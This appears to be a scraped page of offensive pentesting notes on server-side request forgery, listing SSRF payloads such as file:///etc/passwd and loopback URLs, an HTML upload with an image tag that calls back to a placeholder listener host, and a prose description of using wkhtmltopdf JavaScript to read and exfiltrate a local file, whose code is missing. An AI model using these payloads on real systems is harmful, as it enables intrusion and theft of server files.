search

Server Side Request Forgery (SSRF)

hashtag
Basic SSRF payloads

file:///etc/passwd
http://127.0.0.1
http://127.0.0.1:5000
http://127.0.0.1:1
index.html
index.php
http::////127.0.0.1:1

hashtag
Blind SSRF

hashtag
HTML File Upload To SSRF

Make a html file with the following code

<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://<SERVICE IP>:PORT/x?=viaimgtag">
</body>
</html>

upload this file and see if you get a hit on netcat listener

I got a hit on my netcat listener

hashtag
Using Burp Collaborator

use the below code in html file

hashtag
wkhtmltopdf Blind SSRF Exploit

By inspecting the request, we notice wkhtmltopdf in the User-Agent. If we browse wkhtmltopdf's downloads webpagearrow-up-right, the below statement catches our attention:

Do not use wkhtmltopdf with any untrusted HTML – be sure to sanitize any user-supplied HTML/JS; otherwise, it can lead to the complete takeover of the server it is running on! Please read the project status for the gory details.

we can execute JavaScript in wkhtmltopdf! Let us leverage this functionality to read a local file by creating the following HTML document.

In this case, we are using two XMLHttpRequestarrow-up-right objects, one for reading the local file and another one to send it to our server. Also, we are using the btoa function to send the data encoded in Base64.

PreviousBroken AuthenticationNextXML External Entity (XXE)

Last updated